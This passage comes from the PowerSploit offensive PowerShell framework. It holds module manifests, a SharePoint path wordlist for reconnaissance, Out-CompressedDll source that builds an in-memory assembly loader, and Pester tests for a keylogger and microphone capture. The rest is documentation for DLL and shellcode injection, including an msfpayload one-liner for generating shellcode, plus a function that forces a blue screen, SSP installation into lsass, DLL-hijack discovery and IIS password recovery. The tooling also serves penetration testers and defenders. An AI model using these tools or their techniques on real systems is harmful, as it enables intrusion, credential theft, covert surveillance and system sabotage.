43 | 'Write-HijackDll',
44 | 'Get-RegistryAlwaysInstallElevated',
45 | 'Get-RegistryAutoLogon',
46 | 'Get-ModifiableRegistryAutoRun',
47 | 'Get-ModifiableScheduledTaskFile',
48 | 'Get-UnattendedInstallFile',
49 | 'Get-WebConfig',
50 | 'Get-ApplicationHost',
51 | 'Get-SiteListPassword',
52 | 'Get-CachedGPPPassword',
53 | 'Write-UserAddMSI',
54 | 'Invoke-EventVwrBypass',
55 | 'Invoke-PrivescAudit',
56 | 'Get-System'
57 | )
58 |
59 | # List of all files packaged with this module
60 | FileList = 'Privesc.psm1', 'Get-System.ps1', 'PowerUp.ps1', 'README.md'
61 |
62 | }
63 |
--------------------------------------------------------------------------------
/Privesc/Privesc.psm1:
--------------------------------------------------------------------------------
1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
2 |
--------------------------------------------------------------------------------
/Recon/Dictionaries/generic.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/Dictionaries/generic.txt
--------------------------------------------------------------------------------
/Recon/Dictionaries/sharepoint.txt:
--------------------------------------------------------------------------------
1 | _catalogs/masterpage/Forms/AllItems.aspx
2 | _catalogs/wp/Forms/AllItems.aspx
3 | _catalogs/wt/Forms/Common.aspx
4 | _layouts/1033/IMAGES
5 | _layouts/aclinv.aspx
6 | _layouts/addrole.aspx
7 | _layouts/AdminRecycleBin.aspx
8 | _layouts/AreaNavigationSettings.aspx
9 | _Layouts/AreaTemplateSettings.aspx
10 | _Layouts/AreaWelcomePage.aspx
11 | _layouts/associatedgroups.aspx
12 | _layouts/bpcf.aspx
13 | _Layouts/ChangeSiteMasterPage.aspx
14 | _layouts/create.aspx
15 | _layouts/editgrp.aspx
16 | _layouts/editprms.aspx
17 | _layouts/groups.aspx
18 | _layouts/help.aspx
19 | _layouts/images/
20 | _layouts/listedit.aspx
21 | _layouts/ManageFeatures.aspx
22 | _layouts/ManageFeatures.aspx?Scope=Site
23 | _layouts/mcontent.aspx
24 | _layouts/mngctype.aspx
25 | _layouts/mngfield.aspx
26 | _layouts/mngsiteadmin.aspx
27 | _layouts/mngsubwebs.aspx
28 | _layouts/mngsubwebs.aspx?view=sites
29 | _layouts/mobile/mbllists.aspx
30 | _layouts/MyInfo.aspx
31 | _layouts/MyPage.aspx
32 | _layouts/MyTasks.aspx
33 | _layouts/navoptions.aspx
34 | _layouts/NewDwp.aspx
35 | _layouts/newgrp.aspx
36 | _layouts/newsbweb.aspx
37 | _layouts/PageSettings.aspx
38 | _layouts/people.aspx
39 | _layouts/people.aspx?MembershipGroupId=0
40 | _layouts/permsetup.aspx
41 | _layouts/picker.aspx
42 | _layouts/policy.aspx
43 | _layouts/policyconfig.aspx
44 | _layouts/policycts.aspx
45 | _layouts/Policylist.aspx
46 | _layouts/prjsetng.aspx
47 | _layouts/quiklnch.aspx
48 | _layouts/recyclebin.aspx
49 | _Layouts/RedirectPage.aspx?Target={SiteCollectionUrl}_catalogs/masterpage
50 | _layouts/role.aspx
51 | _layouts/settings.aspx
52 | _layouts/SiteDirectorySettings.aspx
53 | _layouts/sitemanager.aspx
54 | _Layouts/SiteManager.aspx?lro=all
55 | _layouts/spcf.aspx
56 | _layouts/storman.aspx
57 | _layouts/themeweb.aspx
58 | _layouts/topnav.aspx
59 | _layouts/user.aspx
60 | _layouts/userdisp.aspx
61 | _layouts/userdisp.aspx?ID=1
62 | _layouts/useredit.aspx
63 | _layouts/useredit.aspx?ID=1&Source=%2F%5Flayouts%2Fpeople%2Easpx
64 | _layouts/viewgrouppermissions.aspx
65 | _layouts/viewlsts.aspx
66 | _layouts/vsubwebs.aspx
67 | _layouts/WPPrevw.aspx?ID=247
68 | _layouts/wrkmng.aspx
69 | _vti_bin/Admin.asmx
70 | _vti_bin/alerts.asmx
71 | _vti_bin/dspsts.asmx
72 | _vti_bin/forms.asmx
73 | _vti_bin/Lists.asmx
74 | _vti_bin/people.asmx
75 | _vti_bin/Permissions.asmx
76 | _vti_bin/search.asmx
77 | _vti_bin/UserGroup.asmx
78 | _vti_bin/versions.asmx
79 | _vti_bin/Views.asmx
80 | _vti_bin/webpartpages.asmx
81 | _vti_bin/webs.asmx
82 | _vti_bin/spsdisco.aspx
83 | _vti_bin/AreaService.asmx
84 | _vti_bin/BusinessDataCatalog.asmx
85 | _vti_bin/ExcelService.asmx
86 | _vti_bin/SharepointEmailWS.asmx
87 | _vti_bin/spscrawl.asmx
88 | _vti_bin/spsearch.asmx
89 | _vti_bin/UserProfileService.asmx
90 | _vti_bin/WebPartPages.asmx
91 | default.aspx
92 | Forms/DispForm.aspx
93 | Forms/DispForm.aspx?ID=1
94 | Forms/EditForm.aspx
95 | Forms/EditForm.aspx?ID=1
96 | Forms/Forms/AllItems.aspx
97 | Forms/MyItems.aspx
98 | Forms/NewForm.aspx
99 | Pages/default.aspx
100 | Pages/Forms/AllItems.aspx
101 | shared documents/forms/allitems.aspx
--------------------------------------------------------------------------------
/Recon/Recon.psm1:
--------------------------------------------------------------------------------
1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
2 |
--------------------------------------------------------------------------------
/ScriptModification/Out-CompressedDll.ps1:
--------------------------------------------------------------------------------
1 | function Out-CompressedDll
2 | {
3 | <#
4 | .SYNOPSIS
5 |
6 | Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.
7 |
8 | PowerSploit Function: Out-CompressedDll
9 | Author: Matthew Graeber (@mattifestation)
10 | License: BSD 3-Clause
11 | Required Dependencies: None
12 | Optional Dependencies: None
13 |
14 | .DESCRIPTION
15 |
16 | Out-CompressedDll outputs code that loads a compressed representation of a managed dll in memory as a byte array.
17 |
18 | .PARAMETER FilePath
19 |
20 | Specifies the path to a managed executable.
21 |
22 | .EXAMPLE
23 |
24 | Out-CompressedDll -FilePath evil.dll
25 |
26 | Description
27 | -----------
28 | Compresses, base64 encodes, and outputs the code required to load evil.dll in memory.
29 |
30 | .NOTES
31 |
32 | Only pure MSIL-based dlls can be loaded using this technique. Native or IJW ('it just works' - mixed-mode) dlls will not load.
33 |
34 | .LINK
35 |
36 | http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html
37 | #>
38 |
39 | [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
40 | [CmdletBinding()]
41 | Param (
42 | [Parameter(Mandatory = $True)]
43 | [String]
44 | $FilePath
45 | )
46 |
47 | $Path = Resolve-Path $FilePath
48 |
49 | if (! [IO.File]::Exists($Path))
50 | {
51 | Throw "$Path does not exist."
52 | }
53 |
54 | $FileBytes = [System.IO.File]::ReadAllBytes($Path)
55 |
56 | if (($FileBytes[0..1] | ForEach-Object {[Char]$_}) -join '' -cne 'MZ')
57 | {
58 | Throw "$Path is not a valid executable."
59 | }
60 |
61 | $Length = $FileBytes.Length
62 | $CompressedStream = New-Object IO.MemoryStream
63 | $DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress)
64 | $DeflateStream.Write($FileBytes, 0, $FileBytes.Length)
65 | $DeflateStream.Dispose()
66 | $CompressedFileBytes = $CompressedStream.ToArray()
67 | $CompressedStream.Dispose()
68 | $EncodedCompressedFile = [Convert]::ToBase64String($CompressedFileBytes)
69 |
70 | Write-Verbose "Compression ratio: $(($EncodedCompressedFile.Length/$FileBytes.Length).ToString('#%'))"
71 |
72 | $Output = @"
73 | `$EncodedCompressedFile = @'
74 | $EncodedCompressedFile
75 | '@
76 | `$DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(`$EncodedCompressedFile),[IO.Compression.CompressionMode]::Decompress)
77 | `$UncompressedFileBytes = New-Object Byte[]($Length)
78 | `$DeflatedStream.Read(`$UncompressedFileBytes, 0, $Length) | Out-Null
79 | [Reflection.Assembly]::Load(`$UncompressedFileBytes)
80 | "@
81 |
82 | Write-Output $Output
83 | }
84 |
--------------------------------------------------------------------------------
/ScriptModification/ScriptModification.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'ScriptModification.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'
11 |
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 |
15 | # Copyright statement for this module
16 | Copyright = 'BSD 3-Clause'
17 |
18 | # Description of the functionality provided by this module
19 | Description = 'PowerSploit Script Preparation/Modification Module'
20 |
21 | # Minimum version of the Windows PowerShell engine required by this module
22 | PowerShellVersion = '2.0'
23 |
24 | # Functions to export from this module
25 | FunctionsToExport = '*'
26 |
27 | # List of all files packaged with this module
28 | FileList = 'ScriptModification.psm1', 'ScriptModification.psd1', 'Out-CompressedDll.ps1', 'Out-EncodedCommand.ps1',
29 | 'Out-EncryptedScript.ps1', 'Remove-Comment.ps1', 'Usage.md'
30 |
31 | }
32 |
--------------------------------------------------------------------------------
/ScriptModification/ScriptModification.psm1:
--------------------------------------------------------------------------------
1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
2 |
--------------------------------------------------------------------------------
/ScriptModification/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire ScriptModification folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module ScriptModification`
7 |
8 | To see the commands imported, type `Get-Command -Module ScriptModification`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
--------------------------------------------------------------------------------
/Tests/Exfiltration.tests.ps1:
--------------------------------------------------------------------------------
1 | Set-StrictMode -Version Latest
2 |
3 | $TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent
4 | $ModuleRoot = Resolve-Path "$TestScriptRoot\.."
5 | $ModuleManifest = "$ModuleRoot\Exfiltration\Exfiltration.psd1"
6 |
7 | Remove-Module [E]xfiltration
8 | Import-Module $ModuleManifest -Force -ErrorAction Stop
9 |
10 | Describe 'Get-Keystrokes' {
11 |
12 | if (Test-Path "$($env:TEMP)\key.log") { Remove-Item -Force "$($env:TEMP)\key.log" }
13 | $WindowTitle = (Get-Process -Id $PID).MainWindowTitle
14 |
15 | $Shell = New-Object -ComObject wscript.shell
16 | $Shell.AppActivate($WindowTitle)
17 |
18 | $KeyLogger = Get-Keystrokes -PassThru
19 | Start-Sleep -Seconds 1
20 |
21 | $Shell.SendKeys("Pester`b`b`b`b`b`b")
22 | $KeyLogger.Dispose()
23 |
24 | It 'Should output to file' { Test-Path "$($env:TEMP)\key.log" | Should Be $true }
25 |
26 | $KeyObjects = Get-Content -Path "$($env:TEMP)\key.log" | ConvertFrom-Csv
27 |
28 | It 'Should log keystrokes' {
29 | $FileLength = (Get-Item "$($env:TEMP)\key.log").Length
30 | $FileLength | Should BeGreaterThan 14
31 | }
32 |
33 | It 'Should get foreground window title' {
34 | $KeyObjects[0].WindowTitle | Should Be $WindowTitle
35 | }
36 |
37 | It 'Should log time of key press' {
38 | $KeyTime = [DateTime]::Parse($KeyObjects[0].Time)
39 | $KeyTime.GetType().Name | Should Be 'DateTime'
40 | }
41 |
42 | It 'Should stop logging after timeout' {
43 |
44 | $Timeout = 0.05
45 | $KeyLogger = Get-Keystrokes -Timeout $Timeout -PassThru
46 |
47 | Start-Sleep -Seconds 4
48 |
49 | $KeyLogger.Runspace.RunspaceAvailability | Should Be 'Available'
50 | $KeyLogger.Dispose()
51 | }
52 |
53 | Remove-Item -Force "$($env:TEMP)\key.log"
54 | }
55 |
56 | Describe "Get-MicrophoneAudio" {
57 |
58 | $RecordPath = "$env:TEMP\test_record.wav"
59 | $RecordLen = 2
60 | Context 'Successful Recording' {
61 | BeforeEach {
62 | #Ensure the recording as been removed prior to testing
63 | Remove-Item -Path $RecordPath -ErrorAction SilentlyContinue
64 | }
65 |
66 | AfterEach {
67 | #Remove the recording after testing
68 | Remove-Item -Path $RecordPath -ErrorAction SilentlyContinue
69 | }
70 |
71 | It 'should record audio from the microphone and save it to a specified path' {
72 | $result = Get-MicrophoneAudio -Path $RecordPath -Length $RecordLen
73 | $result | Should Not BeNullOrEmpty
74 | $result.Length | Should BeGreaterThan 0
75 | }
76 |
77 | }
78 |
79 | Context 'Invalid Arguments' {
80 | It 'should not allow invalid paths to be used' {
81 | { Get-MicrophoneAudio -Path "c:\FAKEPATH\yay.wav" -Length RecordLen} | Should Throw
82 | }
83 | }
84 |
85 | }
86 |
--------------------------------------------------------------------------------
/Tests/PowerSploit.tests.ps1:
--------------------------------------------------------------------------------
1 | Set-StrictMode -Version Latest
2 |
3 | $TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent
4 | $ModuleRoot = Resolve-Path "$TestScriptRoot\.."
5 |
6 | filter Assert-NotLittleEndianUnicode {
7 | [CmdletBinding()]
8 | param (
9 | [Parameter(Mandatory = $True,
10 | ValueFromPipelineByPropertyName = $True,
11 | ValueFromPipeline = $True)]
12 | [Alias('FullName')]
13 | [String[]]
14 | $FilePath
15 | )
16 |
17 | $LittleEndianMarker = 48111 # 0xBBEF
18 |
19 | Write-Verbose "Current file: $FilePath"
20 | Write-Debug "Current file: $FilePath"
21 |
22 | if ([System.IO.Directory]::Exists($FilePath)) {
23 | Write-Debug "File is a directory."
24 | return
25 | }
26 |
27 | if (-not [System.IO.File]::Exists($FilePath)) {
28 | Write-Debug "File does not exist."
29 | return
30 | }
31 |
32 | $FileBytes = Get-Content -TotalCount 3 -Encoding Byte -Path $FilePath
33 |
34 | if ($FileBytes.Length -le 2) {
35 | Write-Debug "File must be at least 2 bytes in length."
36 | return
37 | }
38 |
39 | if ([BitConverter]::ToUInt16($FileBytes, 0) -eq $LittleEndianMarker) {
40 | Write-Debug "File contains little endian unicode marker."
41 | throw "$_ is little-endian unicode encoded."
42 | }
43 | }
44 |
45 | Describe 'ASCII encoding of all scripts' {
46 | It 'should not contain little-endian unicode encoded scripts or modules' {
47 | { Get-ChildItem -Path $ModuleRoot -Recurse -Include *.ps1,*.psd1,*.psm1 | Assert-NotLittleEndianUnicode } | Should Not Throw
48 | }
49 | }
--------------------------------------------------------------------------------
/docs/CodeExecution/Invoke-DllInjection.md:
--------------------------------------------------------------------------------
1 | # Invoke-DllInjection
2 |
3 | ## SYNOPSIS
4 | Injects a Dll into the process ID of your choosing.
5 |
6 | PowerSploit Function: Invoke-DllInjection
7 | Author: Matthew Graeber (@mattifestation)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 | Optional Dependencies: None
11 |
12 | ## SYNTAX
13 |
14 | ```
15 | Invoke-DllInjection [-ProcessID] [-Dll]
16 | ```
17 |
18 | ## DESCRIPTION
19 | Invoke-DllInjection injects a Dll into an arbitrary process.
20 | It does this by using VirtualAllocEx to allocate memory the size of the
21 | DLL in the remote process, writing the names of the DLL to load into the
22 | remote process spacing using WriteProcessMemory, and then using RtlCreateUserThread
23 | to invoke LoadLibraryA in the context of the remote process.
24 |
25 | ## EXAMPLES
26 |
27 | ### -------------------------- EXAMPLE 1 --------------------------
28 | ```
29 | Invoke-DllInjection -ProcessID 4274 -Dll evil.dll
30 | ```
31 |
32 | Description
33 | -----------
34 | Inject 'evil.dll' into process ID 4274.
35 |
36 | ## PARAMETERS
37 |
38 | ### -ProcessID
39 | Process ID of the process you want to inject a Dll into.
40 |
41 | ```yaml
42 | Type: Int32
43 | Parameter Sets: (All)
44 | Aliases:
45 |
46 | Required: True
47 | Position: 1
48 | Default value: 0
49 | Accept pipeline input: False
50 | Accept wildcard characters: False
51 | ```
52 |
53 | ### -Dll
54 | Name of the dll to inject.
55 | This can be an absolute or relative path.
56 |
57 | ```yaml
58 | Type: String
59 | Parameter Sets: (All)
60 | Aliases:
61 |
62 | Required: True
63 | Position: 2
64 | Default value: None
65 | Accept pipeline input: False
66 | Accept wildcard characters: False
67 | ```
68 |
69 | ## INPUTS
70 |
71 | ## OUTPUTS
72 |
73 | ## NOTES
74 | Use the '-Verbose' option to print detailed information.
75 |
76 | ## RELATED LINKS
77 |
78 | [http://www.exploit-monday.com](http://www.exploit-monday.com)
79 |
80 |
--------------------------------------------------------------------------------
/docs/CodeExecution/Invoke-Shellcode.md:
--------------------------------------------------------------------------------
1 | # Invoke-Shellcode
2 |
3 | ## SYNOPSIS
4 | Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process.
5 |
6 | PowerSploit Function: Invoke-Shellcode
7 | Author: Matthew Graeber (@mattifestation)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 | Optional Dependencies: None
11 |
12 | ## SYNTAX
13 |
14 | ```
15 | Invoke-Shellcode [-ProcessID ] [-Shellcode ] [-Force]
16 | ```
17 |
18 | ## DESCRIPTION
19 | Portions of this project was based upon syringe.c v1.2 written by Spencer McIntyre
20 |
21 | PowerShell expects shellcode to be in the form 0xXX,0xXX,0xXX.
22 | To generate your shellcode in this form, you can use this command from within Backtrack (Thanks, Matt and g0tm1lk):
23 |
24 | msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/\[";\]//g;s/\\\\/,0/g' | tr -d '\n' | cut -c2-
25 |
26 | Make sure to specify 'thread' for your exit process.
27 | Also, don't bother encoding your shellcode.
28 | It's entirely unnecessary.
29 |
30 | ## EXAMPLES
31 |
32 | ### -------------------------- EXAMPLE 1 --------------------------
33 | ```
34 | Invoke-Shellcode -ProcessId 4274
35 | ```
36 |
37 | Description
38 | -----------
39 | Inject shellcode into process ID 4274.
40 |
41 | ### -------------------------- EXAMPLE 2 --------------------------
42 | ```
43 | Invoke-Shellcode
44 | ```
45 |
46 | Description
47 | -----------
48 | Inject shellcode into the running instance of PowerShell.
49 |
50 | ### -------------------------- EXAMPLE 3 --------------------------
51 | ```
52 | Invoke-Shellcode -Shellcode @(0x90,0x90,0xC3)
53 | ```
54 |
55 | Description
56 | -----------
57 | Overrides the shellcode included in the script with custom shellcode - 0x90 (NOP), 0x90 (NOP), 0xC3 (RET)
58 | Warning: This script has no way to validate that your shellcode is 32 vs.
59 | 64-bit!
60 |
61 | ## PARAMETERS
62 |
63 | ### -ProcessID
64 | Process ID of the process you want to inject shellcode into.
65 |
66 | ```yaml
67 | Type: UInt16
68 | Parameter Sets: (All)
69 | Aliases:
70 |
71 | Required: False
72 | Position: Named
73 | Default value: 0
74 | Accept pipeline input: False
75 | Accept wildcard characters: False
76 | ```
77 |
78 | ### -Shellcode
79 | Specifies an optional shellcode passed in as a byte array
80 |
81 | ```yaml
82 | Type: Byte[]
83 | Parameter Sets: (All)
84 | Aliases:
85 |
86 | Required: False
87 | Position: Named
88 | Default value: None
89 | Accept pipeline input: False
90 | Accept wildcard characters: False
91 | ```
92 |
93 | ### -Force
94 | Injects shellcode without prompting for confirmation.
95 | By default, Invoke-Shellcode prompts for confirmation before performing any malicious act.
96 |
97 | ```yaml
98 | Type: SwitchParameter
99 | Parameter Sets: (All)
100 | Aliases:
101 |
102 | Required: False
103 | Position: Named
104 | Default value: False
105 | Accept pipeline input: False
106 | Accept wildcard characters: False
107 | ```
108 |
109 | ## INPUTS
110 |
111 | ## OUTPUTS
112 |
113 | ## NOTES
114 |
115 | ## RELATED LINKS
116 |
117 |
--------------------------------------------------------------------------------
/docs/Mayhem/Set-CriticalProcess.md:
--------------------------------------------------------------------------------
1 | # Set-CriticalProcess
2 |
3 | ## SYNOPSIS
4 | Causes your machine to blue screen upon exiting PowerShell.
5 |
6 | PowerSploit Function: Set-CriticalProcess
7 | Author: Matthew Graeber (@mattifestation)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 | Optional Dependencies: None
11 |
12 | ## SYNTAX
13 |
14 | ```
15 | Set-CriticalProcess [-Force] [-ExitImmediately] [-WhatIf] [-Confirm]
16 | ```
17 |
18 | ## DESCRIPTION
19 | {{Fill in the Description}}
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | Set-CriticalProcess
26 | ```
27 |
28 | ### -------------------------- EXAMPLE 2 --------------------------
29 | ```
30 | Set-CriticalProcess -ExitImmediately
31 | ```
32 |
33 | ### -------------------------- EXAMPLE 3 --------------------------
34 | ```
35 | Set-CriticalProcess -Force -Verbose
36 | ```
37 |
38 | ## PARAMETERS
39 |
40 | ### -Force
41 | Set the running PowerShell process as critical without asking for confirmation.
42 |
43 | ```yaml
44 | Type: SwitchParameter
45 | Parameter Sets: (All)
46 | Aliases:
47 |
48 | Required: False
49 | Position: Named
50 | Default value: False
51 | Accept pipeline input: False
52 | Accept wildcard characters: False
53 | ```
54 |
55 | ### -ExitImmediately
56 | Immediately exit PowerShell after successfully marking the process as critical.
57 |
58 | ```yaml
59 | Type: SwitchParameter
60 | Parameter Sets: (All)
61 | Aliases:
62 |
63 | Required: False
64 | Position: Named
65 | Default value: False
66 | Accept pipeline input: False
67 | Accept wildcard characters: False
68 | ```
69 |
70 | ### -WhatIf
71 | Shows what would happen if the cmdlet runs.
72 | The cmdlet is not run.
73 |
74 | ```yaml
75 | Type: SwitchParameter
76 | Parameter Sets: (All)
77 | Aliases: wi
78 |
79 | Required: False
80 | Position: Named
81 | Default value: None
82 | Accept pipeline input: False
83 | Accept wildcard characters: False
84 | ```
85 |
86 | ### -Confirm
87 | Prompts you for confirmation before running the cmdlet.
88 |
89 | ```yaml
90 | Type: SwitchParameter
91 | Parameter Sets: (All)
92 | Aliases: cf
93 |
94 | Required: False
95 | Position: Named
96 | Default value: None
97 | Accept pipeline input: False
98 | Accept wildcard characters: False
99 | ```
100 |
101 | ## INPUTS
102 |
103 | ## OUTPUTS
104 |
105 | ## NOTES
106 |
107 | ## RELATED LINKS
108 |
109 |
--------------------------------------------------------------------------------
/docs/Persistence/Get-SecurityPackage.md:
--------------------------------------------------------------------------------
1 | # Get-SecurityPackage
2 |
3 | ## SYNOPSIS
4 | Enumerates all loaded security packages (SSPs).
5 |
6 | Author: Matthew Graeber (@mattifestation)
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 | Optional Dependencies: None
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-SecurityPackage
15 | ```
16 |
17 | ## DESCRIPTION
18 | Get-SecurityPackage is a wrapper for secur32!EnumerateSecurityPackages.
19 | It also parses the returned SecPkgInfo struct array.
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | Get-SecurityPackage
26 | ```
27 |
28 | ## PARAMETERS
29 |
30 | ## INPUTS
31 |
32 | ## OUTPUTS
33 |
34 | ## NOTES
35 |
36 | ## RELATED LINKS
37 |
38 |
--------------------------------------------------------------------------------
/docs/Persistence/Install-SSP.md:
--------------------------------------------------------------------------------
1 | # Install-SSP
2 |
3 | ## SYNOPSIS
4 | Installs a security support provider (SSP) dll.
5 |
6 | Author: Matthew Graeber (@mattifestation)
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 | Optional Dependencies: None
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Install-SSP [[-Path] ]
15 | ```
16 |
17 | ## DESCRIPTION
18 | Install-SSP installs an SSP dll.
19 | Installation involves copying the dll to
20 | %windir%\System32 and adding the name of the dll to
21 | HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Install-SSP -Path .\mimilib.dll
28 | ```
29 |
30 | ## PARAMETERS
31 |
32 | ### -Path
33 | {{Fill Path Description}}
34 |
35 | ```yaml
36 | Type: String
37 | Parameter Sets: (All)
38 | Aliases:
39 |
40 | Required: False
41 | Position: 1
42 | Default value: None
43 | Accept pipeline input: False
44 | Accept wildcard characters: False
45 | ```
46 |
47 | ## INPUTS
48 |
49 | ## OUTPUTS
50 |
51 | ## NOTES
52 | The SSP dll must match the OS architecture.
53 | i.e.
54 | You must have a 64-bit SSP dll
55 | if you are running a 64-bit OS.
56 | In order for the SSP dll to be loaded properly
57 | into lsass, the dll must export SpLsaModeInitialize.
58 |
59 | ## RELATED LINKS
60 |
61 |
--------------------------------------------------------------------------------
/docs/Privesc/Add-ServiceDacl.md:
--------------------------------------------------------------------------------
1 | # Add-ServiceDacl
2 |
3 | ## SYNOPSIS
4 | Adds a Dacl field to a service object returned by Get-Service.
5 |
6 | Author: Matthew Graeber (@mattifestation)
7 | License: BSD 3-Clause
8 | Required Dependencies: PSReflect
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Add-ServiceDacl [-Name]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a
18 | Dacl field to each object.
19 | It does this by opening a handle with ReadControl for the
20 | service with using the GetServiceHandle Win32 API call and then uses
21 | QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Get-Service | Add-ServiceDacl
28 | ```
29 |
30 | Add Dacls for every service the current user can read.
31 |
32 | ### -------------------------- EXAMPLE 2 --------------------------
33 | ```
34 | Get-Service -Name VMTools | Add-ServiceDacl
35 | ```
36 |
37 | Add the Dacl to the VMTools service object.
38 |
39 | ## PARAMETERS
40 |
41 | ### -Name
42 | An array of one or more service names to add a service Dacl for.
43 | Passable on the pipeline.
44 |
45 | ```yaml
46 | Type: String[]
47 | Parameter Sets: (All)
48 | Aliases: ServiceName
49 |
50 | Required: True
51 | Position: 1
52 | Default value: None
53 | Accept pipeline input: True (ByPropertyName, ByValue)
54 | Accept wildcard characters: False
55 | ```
56 |
57 | ## INPUTS
58 |
59 | ## OUTPUTS
60 |
61 | ### ServiceProcess.ServiceController
62 |
63 | ## NOTES
64 |
65 | ## RELATED LINKS
66 |
67 | [https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/)
68 |
69 |
--------------------------------------------------------------------------------
/docs/Privesc/Find-PathDLLHijack.md:
--------------------------------------------------------------------------------
1 | # Find-PathDLLHijack
2 |
3 | ## SYNOPSIS
4 | Finds all directories in the system %PATH% that are modifiable by the current user.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: Get-ModifiablePath
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Find-PathDLLHijack
14 | ```
15 |
16 | ## DESCRIPTION
17 | Enumerates the paths stored in Env:Path (%PATH) and filters each through Get-ModifiablePath
18 | to return the folder paths the current user can write to.
19 | On Windows 7, if wlbsctrl.dll is
20 | written to one of these paths, execution for the IKEEXT can be hijacked due to DLL search
21 | order loading.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Find-PathDLLHijack
28 | ```
29 |
30 | Finds all %PATH% .DLL hijacking opportunities.
31 |
32 | ## PARAMETERS
33 |
34 | ## INPUTS
35 |
36 | ## OUTPUTS
37 |
38 | ### PowerUp.HijackableDLL.Path
39 |
40 | ## NOTES
41 |
42 | ## RELATED LINKS
43 |
44 | [http://www.greyhathacker.net/?p=738](http://www.greyhathacker.net/?p=738)
45 |
46 |
--------------------------------------------------------------------------------
/docs/Privesc/Get-ApplicationHost.md:
--------------------------------------------------------------------------------
1 | # Get-ApplicationHost
2 |
3 | ## SYNOPSIS
4 | Recovers encrypted application pool and virtual directory passwords from the applicationHost.config on the system.
5 |
6 | Author: Scott Sutherland
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-ApplicationHost
14 | ```
15 |
16 | ## DESCRIPTION
17 | This script will decrypt and recover application pool and virtual directory passwords
18 | from the applicationHost.config file on the system.
19 | The output supports the
20 | pipeline which can be used to convert all of the results into a pretty table by piping
21 | to format-table.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Return application pool and virtual directory passwords from the applicationHost.config on the system.
28 | ```
29 |
30 | Get-ApplicationHost
31 |
32 | user : PoolUser1
33 | pass : PoolParty1!
34 | type : Application Pool
35 | vdir : NA
36 | apppool : ApplicationPool1
37 | user : PoolUser2
38 | pass : PoolParty2!
39 | type : Application Pool
40 | vdir : NA
41 | apppool : ApplicationPool2
42 | user : VdirUser1
43 | pass : VdirPassword1!
44 | type : Virtual Directory
45 | vdir : site1/vdir1/
46 | apppool : NA
47 | user : VdirUser2
48 | pass : VdirPassword2!
49 | type : Virtual Directory
50 | vdir : site2/
51 | apppool : NA
52 |
53 | ### -------------------------- EXAMPLE 2 --------------------------
54 | ```
55 | Return a list of cleartext and decrypted connect strings from web.config files.
56 | ```
57 |
58 | Get-ApplicationHost | Format-Table -Autosize
59 |
60 | user pass type vdir apppool
61 | ---- ---- ---- ---- -------
62 | PoolUser1 PoolParty1!
63 | Application Pool NA ApplicationPool1
64 | PoolUser2 PoolParty2!
65 | Application Pool NA ApplicationPool2
66 | VdirUser1 VdirPassword1!
67 | Virtual Directory site1/vdir1/ NA
68 | VdirUser2 VdirPassword2!
69 | Virtual Directory site2/ NA
70 |
71 | ## PARAMETERS
72 |
73 | ## INPUTS
74 |
75 | ## OUTPUTS
76 |
